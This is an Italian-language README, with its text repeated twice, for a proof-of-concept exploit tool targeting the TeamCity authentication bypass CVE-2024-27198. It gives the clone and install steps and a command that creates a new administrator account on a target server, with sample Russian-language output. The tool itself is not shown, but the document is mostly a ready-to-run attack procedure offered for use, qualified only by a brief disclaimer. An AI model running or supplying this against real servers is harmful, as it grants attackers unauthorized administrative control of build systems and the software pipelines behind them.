
è uno strumento PoC che sfrutta una vulnerabilità nel server TeamCity (CVE-2024-27198)
GenTeamCityExploit è uno strumento PoC che prende di mira una vulnerabilità nel server TeamCity (CVE-2024-27198). Consente di individuare la versione di TeamCity e di creare un nuovo utente amministratore sfruttando una falla di bypass dell'autenticazione.
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: l'URL del server TeamCity di destinazione.-u, --username: il nome utente per il nuovo utente amministratore.-p, --password: la password per il nuovo utente amministratore.python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
Nel caso in cui il server non sia vulnerabile o la versione non venga trovata:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
Se si verifica un errore di connessione al server:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
Questo strumento è destinato esclusivamente a scopi educativi e non deve essere utilizzato su alcun sistema senza l'esplicita autorizzazione del proprietario. L'accesso non autorizzato a sistemi informatici è illegale.
GenTeamCityExploit è uno strumento PoC che prende di mira una vulnerabilità del server TeamCity (CVE-2024-27198). Permette di rilevare la versione di TeamCity e di creare un nuovo amministratore sfruttando una vulnerabilità di bypass dell'autenticazione.
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: l'URL del server TeamCity di destinazione.-u, --username: il nome utente per il nuovo amministratore.-p, --password: la password per il nuovo amministratore.python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
Nel caso in cui il server non sia vulnerabile o la versione non venga trovata:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
In caso di errore di connessione al server:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
Questo strumento è destinato esclusivamente a scopi educativi e non deve essere utilizzato su alcun sistema senza l'esplicita autorizzazione del proprietario. L'accesso non autorizzato a sistemi informatici è illegale.